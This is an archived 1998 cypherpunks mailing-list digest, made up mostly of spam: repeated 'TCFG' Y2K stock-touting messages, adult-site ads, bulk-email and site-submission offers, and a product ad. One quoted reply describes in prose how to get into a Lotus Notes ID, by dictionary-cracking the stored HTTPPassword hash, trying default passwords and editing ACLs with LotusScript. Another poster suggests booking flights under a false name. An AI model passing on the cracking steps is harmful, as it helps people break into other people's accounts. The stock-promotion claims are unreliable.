> > >At 01:15 PM 10/26/98 -0500, Duncan Frissell wrote:
> > >>9.  "I do not posses any government-issued photo ID and thus
cannot travel
> > >>to the location stated in the subpoena. 
> > >
> > >ROTFLMAO...
> > >
> > >This last one is too funny to not use.  I don't have a subpoena,
but I can
> > >just see myself writing back explaining this and requesting
assistance with
> > >a plane flight to solve this problem.
> > 
> > Actually you don't need state id to fly, legally.  But the
airlines will
> > hassle you and not put your bags aboard til you are.  There
> > are references on the net to flying without state id.
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> >   
> > 
> > 
> > 
> > 
> 
> 

==
My Favorite Surfing Sites:

http://www.dilbert.com/ and http://www.nro.odci.gov/

"To keep you is no benefit; to destroy you is no loss"  by Thida Mam


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Tue, 27 Oct 1998 11:45:08 -0800 (PST)
Subject: Airline ID Checking (was: RE: your mail)
In-Reply-To: <19981027190715.184.rocketmail@send101.yahoomail.com>
Message-ID: <000001be01e2$296564a0$9c2580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know what the airlines do with the info they collect off the ID?
Are they just noting whether the names match, or is it more sinister?

When I was below legal drinking age (21 in my state) I would drive up to the
window (how barbaric!  liquor sales to guys in cars!) and give the
sub-moronic guy my REAL ID under the assumption that:  he expects it to say
something that proves I am over age, or else why would I be handing it to
him? [nicely enough, this shifts all of the risk of the transaction to him,
should it go wrong.]

Similarly, if you booked a flight under the name Nevah Umind, when you hand
over a piece of ID, they look to see it says Nevah Umind (unless, of course,
your name happens to be Nevah Umind) and that's all they want, right?

And if we all booked flights under the same name, then wouldn't that throw
'em WAY off?  Pick a name, DON'T scan your license in, DON'T edit it, DON'T
laminate it, and (for pete's sake!) DON'T use that name.  Their querying
will tell them, "I have a match, he's okay" (These are not the droids you
are looking for, eh!) and away you go!

X


~> -----Original Message-----
~> From: owner-cypherpunks@minder.net
~> [mailto:owner-cypherpunks@minder.net]On Behalf Of Joel O'Connor
~> I traveled by train all the way to Florida from Rhode Island once.  24
~> hours straight it took man and I swore I would never do it again.
~> 40-50 people per car and basically one bathroom per car.  Come morning
~> time man, the lines for the bathrooms stretched out of the cars.
~> Screw that, I could have flown and made it in 3 hours. Plus it's
~> easier for the gov't to stop trains and search them, I'd rather go
~> with the flight.
~>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Tue, 27 Oct 1998 16:55:24 -0800 (PST)
To: undisclosed-recipients:;
Subject: Manage your Assets, Simplify your Life---- Extensis Portfolio 4.0
Message-ID: <bulk.1616.19981027121909@mailblast.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Introducing the Newest Version of our Asset Management
Software-Extensis Portfolio 4.0
 http://www.extensis.com/products/Portfolio/


- Organize your assets -images, text, photos, multimedia- for
instant-access
- NEW! Import information from other databases
- NEW! Robust scripting now facilitates database and internet publishing
- NEW! Slideshow feature provides full-screen display of images
- NEW! Scalability with Portfolio Server 4.0 ensures lightening-fast
access for workgroups

Extensis Portfolio 4.0 and Portfolio Server 4.0 will help you manage and
organize your digital assets.  Digital assets include digital images,
artwork, presentations, multimedia, photos, or other graphic documents
that need to be organized and shared.

Extensis Portfolio 4.0 offers you a place to catalog, view, manage,
select, search and even share digital content among multiple users. 
Find the images you need, find them fast, share them with partners
around the globe all through your network or the Web with NEW
Portfolio 4.0 and Portfolio Server 4.0.

Create database fields that match your business with Portfolio's
unlimited custom fields.  Then, import your assets from other databases
for a centralized asset management system. With Portfolio's advanced
searching features, you will never hunt-and-peck for your images again.
And with Portfolio's built-in scripting you can automate regular tasks,
such as Internet and database publishing-in no time.

Portfolio 4.0 is the only scalable solution that allows you to start
with as few as one user (using the stand-alone client software) and add
more users (by adding additional clients; without requiring a server) as
your needs grow. 

For larger workgroups, the NEW Portfolio Server 4.0 will enable dozens
of users to access your assets without a loss of performance. Portfolio
Server can be inserted into a workgroup at any time, without the need to
replace the existing Portfolio 4.0 client (single-user) versions. 

Plus, the NEW Portfolio Server 4.0 arrives with 5 free copies of
Portfolio 4.0- a  value.

Streamline your work, build your assets, and simplify your life-Extensis
Portfolio 4.0

To download a FREE demo, get information, or to buy on-line, visit 
http://www.extensis.com/products/Portfolio/
Or call Extensis at 1(800) 796-9798 Ext. 404 or (503) 274-2020 Ext. 404.


Portfolio 4.0  System Requirements: 
Macintosh
Mac OS 7.5.3 - 8.5
PowerPC, 32 MB of RAM
Windows
Windows 95, 98 or NT 4.0
Pentium, 32 MB of RAM 

Portfolio Server 4.0 System Requirements
Windows 
Win NT 4.0, Pentium, 32 MB RAM
Macintosh
Macintosh version available late 1998

PS. We have made every effort to ensure this message is being sent only
to people who have expressed interest in Extensis products.  If we have
sent this to you in error, please accept our apologies and reply with
"REMOVE" in the subject line for automatic exclusion from future
communications.  If you know someone who would like to be on our mailing
list have them send an email to listmaster@extensis.com with "ADD" in the subject line and
their email address in the body.

P.P.S. This message is intended for North American customers.  If you
are located outside of North America and have received this message,
please visit  www.extensis.com/purchase/ to find the nearest local
distributor in your country.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED WED OCT 28 <stuffed@stuffed.net>
Date: Wed, 28 Oct 1998 11:47:17 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981028081001.21320.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ EROTIC VIXENS
+ PLAY SLUTS
+ WANNA CUM
+ HENTAI ANIME
+ WACK IT OFF
+ HIGH RENT
+ JAMHOLE
+ WET WET WEB
+ HIGH RENT
+ ADULT PLAY TOYS
+ BONUS PIC 1 -> http://www.stuffed.net/home/19099.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/32083.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/9600.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/6549.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/3415.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StoneCold-PT <pouttarac@yahoo.com>
Date: Wed, 28 Oct 1998 08:50:01 -0800 (PST)
To: Diederik Smets <cypherpunks@toad.com
Subject: unsubcribe
Message-ID: <19981028164909.28663.rocketmail@send1d.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe




---Diederik Smets <Diederik.Smets@emd.be> wrote:
>
> IF the owner of the id also entered an internet password AND it is
the same
> as the one for the id file, then you can use brute force
(dictionairies) to
> try and crack it. Get the encrypted value in the
> properties>fields>HTTPPassword of the persons document in the PNAB and
> compare it to the results of the @password() function.
> 
> Alternatively, do a search for old id files which might still be
accessible
> with the 'default' password (if you know which one that is), but you
won't
> be able to access servers that have the 'check password' option
enabled.
> 
> If you need to access a local DB that has 'enforce a consistant ACL
across
> all replicas' enabled, just use another id and add that person's
name with
> the necessary roles to the ACL via LotusScript.
> 
> Diederik
> 
> 
> Hello
>      I'm using lotus notes and I have a big problem. I have a id
file with
> no
> password. How can I get a password for it or reset it. Is there some
type
> of
> utility or something someone knows of?I have been told that I'm out
of luck
> unless I have the original.
> 
> John...
> 
> 
> 

==
My Favorite Surfing Sites:

http://www.dilbert.com/ and http://www.nro.odci.gov/

"To keep you is no benefit; to destroy you is no loss"  by Thida Mam


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <emergency@yahoo.com>
Date: Wed, 28 Oct 1998 14:21:17 -0800 (PST)
Subject: No Subject
Message-ID: <989.283923.888827 emergency@yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain


10/28/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts...

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!





 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marti@cestel.es
Date: Wed, 28 Oct 1998 21:33:12 -0800 (PST)
To: monty@monty-river.co.uk
Subject: Hi
Message-ID: < >
MIME-Version: 1.0
Content-Type: text/plain


Do you know what the number one factor is, that will determine whether your business is a
success or not?  ADVERTISING!  Effective conventional advertising is quite expensive.  So
what do you do?  Direct email is one of, if not thee most effective method of advertising in 
the 90's.  You can get your ad out to hundreds of thousands, even millions, for only a fraction of 
the cost of traditional advertising.  The wave of future advertising is here, don't miss it.  We
will send your advert for you.  We have gone through painstaking methods to insure that we
have the the most quality lists on the Internet.  We send your ad for your, all you have to do
is create it.


250,000 addresses - $199
350,000 addresses - $250
500,000 addresses - $350
1 million addresses - $700 (HALLOWEEN SPECIAL 1 MILLION ONLY $500, OFFER
GOOD UNTIL OCTOBER 31ST)

For advertising to 3 million or more ask about our special rates.

For more information or to place an ad call us at (702) 294-7769 between the hours of 
11 am - 3 pm Pacific. Mon-Fri.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Wed, 28 Oct 1998 23:17:01 -0800 (PST)
To: undisclosed-recipients:;
Subject: Manage your Assets, Simplify your Life---- Extensis Portfolio 4.0
Message-ID: <bulk.10274.19981028195042@mailblast.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Introducing the Newest Version of our Asset Management
Software-Extensis Portfolio 4.0
 http://www.extensis.com/products/Portfolio/


- Organize your assets -images, text, photos, multimedia- for
instant-access
- NEW! Import information from other databases
- NEW! Robust scripting now facilitates database and internet publishing
- NEW! Slideshow feature provides full-screen display of images
- NEW! Scalability with Portfolio Server 4.0 ensures lightening-fast
access for workgroups

Extensis Portfolio 4.0 and Portfolio Server 4.0 will help you manage and
organize your digital assets.  Digital assets include digital images,
artwork, presentations, multimedia, photos, or other graphic documents
that need to be organized and shared.

Extensis Portfolio 4.0 offers you a place to catalog, view, manage,
select, search and even share digital content among multiple users. 
Find the images you need, find them fast, share them with partners
around the globe all through your network or the Web with NEW
Portfolio 4.0 and Portfolio Server 4.0.

Create database fields that match your business with Portfolio's
unlimited custom fields.  Then, import your assets from other databases
for a centralized asset management system. With Portfolio's advanced
searching features, you will never hunt-and-peck for your images again.
And with Portfolio's built-in scripting you can automate regular tasks,
such as Internet and database publishing-in no time.

Portfolio 4.0 is the only scalable solution that allows you to start
with as few as one user (using the stand-alone client software) and add
more users (by adding additional clients; without requiring a server) as
your needs grow. 

For larger workgroups, the NEW Portfolio Server 4.0 will enable dozens
of users to access your assets without a loss of performance. Portfolio
Server can be inserted into a workgroup at any time, without the need to
replace the existing Portfolio 4.0 client (single-user) versions. 

Plus, the NEW Portfolio Server 4.0 arrives with 5 free copies of
Portfolio 4.0- a  value.

Streamline your work, build your assets, and simplify your life-Extensis
Portfolio 4.0

To download a FREE demo, get information, or to buy on-line, visit 
http://www.extensis.com/products/Portfolio/
Or call Extensis at 1(800) 796-9798 Ext. 404 or (503) 274-2020 Ext. 404.


Portfolio 4.0  System Requirements: 
Macintosh
Mac OS 7.5.3 - 8.5
PowerPC, 32 MB of RAM
Windows
Windows 95, 98 or NT 4.0
Pentium, 32 MB of RAM 

Portfolio Server 4.0 System Requirements
Windows 
Win NT 4.0, Pentium, 32 MB RAM
Macintosh
Macintosh version available late 1998

PS. We have made every effort to ensure this message is being sent only
to people who have expressed interest in Extensis products.  If we have
sent this to you in error, please accept our apologies and reply with
"REMOVE" in the subject line for automatic exclusion from future
communications.  If you know someone who would like to be on our mailing
list have them send an email to listmaster@extensis.com with "ADD" in the subject line and
their email address in the body.

P.P.S. This message is intended for North American customers.  If you
are located outside of North America and have received this message,
please visit  www.extensis.com/purchase/ to find the nearest local
distributor in your country.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <research@hampton.net>
Date: Thu, 29 Oct 1998 02:28:59 -0800 (PST)
Subject: No Subject
Message-ID: <989.283923.759256 research@hampton.net>
MIME-Version: 1.0
Content-Type: text/plain


                             10/29/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!





 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <watcher@freeyellow.com>
Date: Thu, 29 Oct 1998 06:17:27 -0800 (PST)
Subject: No Subject
Message-ID: <989.283923.519186 watcher@freeyellow.com>
MIME-Version: 1.0
Content-Type: text/plain


                             10/29/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!





 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED THU OCT 29 <stuffed@stuffed.net>
Date: Thu, 29 Oct 1998 17:07:51 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981029081000.6342.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ DREAM GIRLS
+ BLACK NYMPHOS
+ WET DREAMS
+ HORNY OLD LADIES
+ JUST BLONDES NAKED
+ XBABES
+ HOT ROD
+ HOIHOI GIRLS
+ SMUT FOR FREE
+ MISS TEASE FREE XXX PLAYHOUSE
+ BONUS PIC 1 -> http://www.stuffed.net/home/13713.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/10549.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/23736.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/21072.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/32445.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kderby@bayoucity.com
Date: Thu, 29 Oct 1998 08:27:56 -0800 (PST)
To: anna879083@aol.com
Subject: =?windows-1257?Q?<<<<<_CELEBRITY_WEB_SITE_=96_FAMOUS_OR_IMFAMOUS_?==?windows-1257?Q?=3F=3F_>>>>>?=
Message-ID: <862566AC.00553B3B.6C@genesis.bayoucity.com>
MIME-Version: 1.0
Content-Type: text/plain


A friend of mine asked me to send this web site to you. I hope you have as
much fun with it as I have!


www.celebritypctv.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph11627@yahoo.com
Date: Sun, 1 Nov 1998 14:19:40 -0800 (PST)
Subject: about your site
Message-ID: <199811012206.OAA13547@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

      For A "One Time Cost" Of Only $39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why businesses both large and small have
 come to us to utilize our services.  Hotels, 
 Motels, On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many, 
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 or Canada or (916) 771-4739 outside the USA
 and we'll provide you with all the necessary
 information to get you submitted Right Away... 















REMOVE INSTRUCTIONS

To be removed from our email list, please return 
this message with the word, "remove" (without 
quotes) in the subject line.
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: myfriends@compuserve.com
Date: Thu, 29 Oct 1998 05:38:51 -0800 (PST)
To: myfriends@compuserve.com
Subject: Build a Web Site- Free test drive, tell a friend!
Message-ID: <75412325_68882773>
MIME-Version: 1.0
Content-Type: text/plain



----------------------------------------------------------------------
We received your email as someone who might be
interested in our exciting opportunity. If this was a
mistake - delete or see remove instructions below.
----------------------------------------------------------------------


Finally, something on the Web that's Fun, Interactive and adds Value!
Take advantage of this Free Trial and be sure to forward this to a
FRIEND.

Build your own Web Site in less than 15 min. in 9 easy steps!  Visit
http://www.siteblazer.com and simply enter your info and watch your
site build before your eyes.  Click here   http://www.siteblazer.com
anybody can do it!  Your Web Site will be updateable and requires no
programming skills.


Remove Instructions
If you no longer wish to receive any of our future mailings,
you can be removed from this mailing list by sending a
message to pleaseremove6000@mypad.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: informant@freeyellow.com
Date: Thu, 29 Oct 1998 18:44:23 -0800 (PST)
Subject: No Subject
Message-ID: <199810300244.SAA08298@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


10/29/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for...







  
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: concerned@aol.com
Date: Fri, 30 Oct 1998 05:25:03 -0800 (PST)
Subject: No Subject
Message-ID: <199810301318.FAA12335@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Oct.30th,1998

                       
Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!







  
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED FRI OCT 30 <stuffed@stuffed.net>
Date: Fri, 30 Oct 1998 19:34:28 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981030081000.10586.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ GOO GOO'S PLEASURE PALACE
+ VANESSA'S INN
+ XBABES
+ SEXY STUFF
+ MASTURB8
+ INSTANT BONER
+ GIMMIE PORN
+ SEX PALADIUM
+ ADULT HUT
+ EXXXCEPTIONAL XXX PHOTOS
+ BONUS PIC 1 -> http://www.stuffed.net/home/8327.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/21783.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/5104.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/2827.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/28707.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: submit1500@mailexcite.com
Date: Thu, 29 Oct 1998 17:57:23 -0800 (PST)
To: submit1500@mailexcite.com
Subject: RE:  November 1st
Message-ID: <199810300157.RAA07671@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



                We'll Submit Your Site To 

                       Over 1,500

         Search Engines, Directories, & Links Pages

            For Special Price of Only $39.95 !!!


***  Order by November 1st and receive  ***
 *** 275 Money-Making Reports for FREE!! ***

   *** Immediately Increase Your Sites Exposure ***

 For Less Than 3 Cents Each We Will Submit Your
 Web Site To Over 1,500 Of The Net's Hottest Search 
 Engines, Directories & Links Pages.

 You know as well as we that your time is
 best utilized managing your business. For just 
 $39.95 we'll take the work load off your back instead 
 of you trying to do it manually which
 can take hours upon hours and even days to do.

********************************
 Here's how easy it is to order.
********************************


Print out this email.  
Then FAX the below ORDER FORM to:  1-860-456-8850

(ORDER BEFORE NOVEMBER 1ST TO GET 275 MONEY-MAKING REPORTS)


-----  ORDER FORM  ------



YOUR NAME  

____________________________________ 

MAILING ADDRESS
 
__________________________________  

CITY  ______________________________ 
  
STATE  _____________________________ 
  
ZIP CODE  _________________________ 
  
EMAIL  ___________________


THE WEBSITE URL YOU WISH TO SUBMIT

http://______________________________

********************
PAYMENT INFORMATION:
********************

Provide Following Credit Card Payment Information:
(your card will be charged once for $39.95)

NAME ON CARD _______________________________

Type of Card:    MASTERCARD  VISA  (circle one)

CARD NUMBER ___________________________

EXP DATE  ___________________

YOUR SIGNATURE ________________________________


You may also pay by check by attaching it to this form, made payable to:  1,500 SUBMISSION SERVICE COMPANY

********************************************
After we receive your order we will immediately submit your website!!  YOU WILL BE GIVEN SECRET URL TO RETRIEVE REPORTS!!
********************************************

----- THANK YOU FOR YOUR ORDER ------




             1,500 SUBMISSION SERVICE COMPANY
                    FAX 1-860-456-8850





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <informant@earthlink.net>
Date: Fri, 30 Oct 1998 11:20:11 -0800 (PST)
Subject: No Subject
Message-ID: <989.283923.236761 informant@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


                            10/30/98

Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif.

OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for.....





 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@innovativetx.com
Date: Sat, 31 Oct 1998 12:36:17 -0800 (PST)
To: info@innovativetx.com
Subject: Company Press Release - Oct. 29
Message-ID: <199810301949.TAA06109@websites>
MIME-Version: 1.0
Content-Type: text/plain


Thursday October 29, 12:55 pm Eastern Time
Company Press Release

SOURCE: Innovative Tracking Solutions Corp.
Innovative Tracking Solutions Joins Forces With Leading Medical Experts; Private Practice Protocols to be Introduced in 4th Qtr 1998

LAGUNA HILLS, Calif., Oct. 29 /PRNewswire/ -- Innovative Tracking Solutions Corp. (OTC Bulletin Board: IVTX - news) announced today that it has teamed up with three leading experts in three significant areas of expertise, Incontinence, Woundcare and Injury Prevention/Ergonomics to develop and implement three new protocols for the Private Practice(TM) Vibration Reminder System for specific applications of the product in their respective fields. 

The Private Practice(TM) Vibration Reminder Disk is worn on the body or in the pocket and automatically, consistently and silently vibrates at specific intervals throughout the day to prompt or remind patients to do their prescribed therapy regimen at home, work or wherever they may be. The product is currently being used in the healthcare industry for over 50 applications from post-surgical to biofeedback. 

``In addition to general rehabilitation, we have isolated three of the most significant and prevalent problems and situations in which our product has the most impact,'' stated Dianna Cleveland, president and CEO of Innovative Tracking Solutions. ``We are honored to have these well-known experts spearheading the development of these new protocols which will help professionals in these fields to more quickly and effectively implement the Private Practice(TM) system with their patients and clients.'' 

In Incontinence Therapy: Genevieve Messick, M.D., was an integral team member in the development of a behavioral incontinence program that is delivered in over sixty clinics throughout the country. The program carries an 80 percent success rate for eliminating incontinence symptoms in properly selected patients. Dr. Messick currently has her own practice, received her B.S. from John Caroll University in Cleveland, Ohio and graduated cum laude from Ohio State University College of Medicine in Columbus, Ohio. Dr. Messick has recently received a patent for a device for the treatment of pelvic floor dysfunction and she is a member of AOA (Alpha Omega Alpha -- a national medical honor society). 

``We are thrilled to have Dr. Messick's expertise and enthusiasm behind this project. She is a prominent and respected expert in her field and she clearly envisions the dramatic impact our product will have in addressing the problem of incontinence which afflicts more than 13 million Americans,'' stated Scott Postle, vice president, Healthcare Division of Innovative Tracking Solutions. ``Over 80 percent of cases of urinary incontinence can be cured or improved with proper training and compliance with Kegel exercise therapy. Private Practice(TM) is a natural extension to these therapies, including biofeedback.'' 

``After finding out about the Private Practice(TM) Vibration Reminder Disk, we immediately began prescribing the device to our patients,'' said Dr. Messick. ``We have had a positive response from our patients and I am excited about working with Innovative Tracking Solutions in developing this protocol.'' 

In Wound Care: Evonne Fowler, RN, CNS, CWOCN (Certified Wound Ostomy Continence Nurse), is President of Dynamic New Directions, an educational and consulting company in Banning, Calif. She is a Clinical Nurse Specialist in Gerontology having graduated from the UCLA School of Nursing. Ms. Fowler is currently in practice as a Wound/Skin Care Specialist at Kaiser Permanente Hospital, Bellflower, Calif., where she manages the Chronic Wound Care Center. She serves on the Editorial Board for Ostomy/Wound Management and chairs the Annual Advanced Wound Care Symposium sponsored by Health Management Publications, Inc., and is a founding board member and President of the newly formed Association for the Advancement of Wound Care (AAWC). The AAWC is a multidisciplinary organization whose mission is to facilitate optimal care for people with wounds. She is also a past member of the National Pressure Ulcer Advisory Panel (NPUAP). 

``Working with Evonne has been quite illuminating. Her 25 plus years in wound care nursing and vast knowledge of the challenges that exist in Ostomy/Wound Care today has been instrumental in developing our Wound Care Protocol,'' said Mr. Postle. 

``I'm a true believer in that preventing pressure ulcers is much easier than treating them once they develop. It's simply a matter of frequent and consistent repositioning or 'unweighting' throughout the day,'' stated Ms. Fowler. ``This little disk is so effective in prompting bedridden or wheelchair-bound patients to do this repositioning that I expect it to save the healthcare industry tremendous dollars in wound care!'' 

